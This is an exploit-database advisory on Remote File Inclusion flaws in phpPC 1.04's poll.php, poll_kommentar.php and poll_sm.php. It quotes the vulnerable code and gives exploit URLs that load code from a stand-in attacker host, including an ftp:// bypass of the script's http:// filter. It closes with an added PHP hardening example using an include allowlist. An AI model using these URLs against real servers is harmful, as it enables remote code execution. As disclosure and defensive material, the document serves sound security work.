Vendor: PHP Poll Creator
By: iss4m
CVSS: 7.5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: PHP Poll Creator
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpPC 1.04 Multiple Remote File Inclusion

phpPC 1.04 contains multiple Remote File Inclusion vulnerabilities in poll.php, poll_kommentar.php and poll_sm.php. The vulnerable code is located at line 13 of poll.php, line 18 of poll_kommentar.php and line 8 of poll_sm.php. In each file the variable $relativer_pfad is prepended to the path passed to include, so an attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application.

For example, in poll.php, an attacker can send a malicious URL like http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?. Similarly, in poll_kommentar.php, an attacker can send a malicious URL like http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?. In poll_sm.php, which only rejects values containing "http://" or "../", an attacker can send a malicious URL like http://localhost/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://attacker/inject.txt?.

Mitigation:

Upgrade to the latest version of phpPC 1.04 or apply the patch provided by the vendor.

Exploit-DB raw data:

phpPC 1.04 Multiple Remote File Inclusion

Script        : PHP Poll Creator
Version       : 1.04
Vendor URL    : http://www.phppc.de
Impact        : Remote File Inclusion
Discovered by : iss4m
Contact       : iss4m.1@gmail.com


Vulnerable code in poll.php
--------------------------------

<?php
if ($is_phppc_included != 1) {
    include "config.inc.php";
    $file = "lib/functions.inc.php";
    include $relativer_pfad.$file;
    include ($relativer_pfad . "layout_top.inc.php");
    $is_phppc_included = 1;
}else include $relativer_pfad . "lib/get_config.inc.php"; #<== !!!!

Exploit :
**********

http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?


Vulnerable code in poll_kommentar.php
-------------------------------------

<?php

if ($is_phppc_included != 1) {
    include "config.inc.php";
    include ($relativer_pfad . "lib/functions.inc.php");
}
$com = "phppc_kommentar";
$cookie = $cookie_name.$com.$poll_id;
$cookie_ueberwachung = ${$cookie};
if($action=='new_com') {
    if ($cookie_ueberwachung=="flood") {
        $must_not_create_com = 1;
    }else {
        $zeit = time() + 30;
        SetCookie("$cookie_name$com$poll_id","flood","$zeit","/");        
    }
}
if ($is_phppc_included != 1) {
    include "layout_top.inc.php";
    $is_phppc_included = 1;
}
include $relativer_pfad . "poll_titel_kat.inc.php";  # Here !!!!!!!!


http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt ?



Vulnerable code in poll_sm.php
---------------------------------

if(substr_count($relativer_pfad,"http://") >= 1 OR substr_count($relativer_pfad,"../") >= 1) $relativer_pfad = "";

if ($is_phppc_included != 1) {
    $file = "lib/functions.inc.php";
    include $relativer_pfad.$file;
}
include ($relativer_pfad . "layout_top_sm.inc.php");


The script only checks whether $relativer_pfad contains "http://", but we can include a remote file using ftp://

Exploit :
**********

http://localhost/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://user:pass@ftp.attacker.ltd/script.txt ?

# milw0rm.com [2006-11-21]
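
The poll_sm.php filter quoted above, next to a hardened include, as an added example (not phpPC's code and not the vendor's patch). The names phppc_original_filter, phppc_include_path and PHPPC_INCLUDES are hypothetical, and the example assumes the helper file lives in the phpPC install directory so that __DIR__ is the include base.

```php
<?php
declare(strict_types=1);

// The denylist from poll_sm.php, wrapped in a function (hypothetical name)
// so its behaviour can be checked against sample values.
function phppc_original_filter(string $relativer_pfad): string
{
    if (substr_count($relativer_pfad, "http://") >= 1 || substr_count($relativer_pfad, "../") >= 1) {
        $relativer_pfad = "";
    }
    return $relativer_pfad;
}

// Hardened replacement (hypothetical helper): the base directory is fixed
// on the server and the file name must be on an allowlist, so no request
// data ever reaches include.
const PHPPC_INCLUDES = [
    'lib/functions.inc.php',
    'lib/get_config.inc.php',
    'layout_top.inc.php',
    'layout_top_sm.inc.php',
    'poll_titel_kat.inc.php',
];

function phppc_include_path(string $file, string $baseDir = __DIR__): string
{
    if (!in_array($file, PHPPC_INCLUDES, true)) {
        throw new InvalidArgumentException("include not allowed: $file");
    }
    return rtrim($baseDir, '/\\') . DIRECTORY_SEPARATOR . $file;
}

// Constructed inputs: the two values from the advisory plus an empty one.
$samples = ['http://attacker/inject.txt?', 'ftp://attacker/inject.txt?', ''];
foreach ($samples as $value) {
    $kept = phppc_original_filter($value);
    $verdict = ($kept === '') ? 'cleared by denylist' : 'PASSED THROUGH denylist';
    printf("%-34s %s\n", var_export($value, true), $verdict);
}

// The hardened path is built only from server-side values.
echo phppc_include_path('lib/functions.inc.php'), "\n";
```

In the scripts, each `include $relativer_pfad . "..."` would become `include phppc_include_path('...')`. Setting allow_url_include = Off (the default since PHP 5.2) additionally blocks http:// and ftp:// includes at the interpreter level.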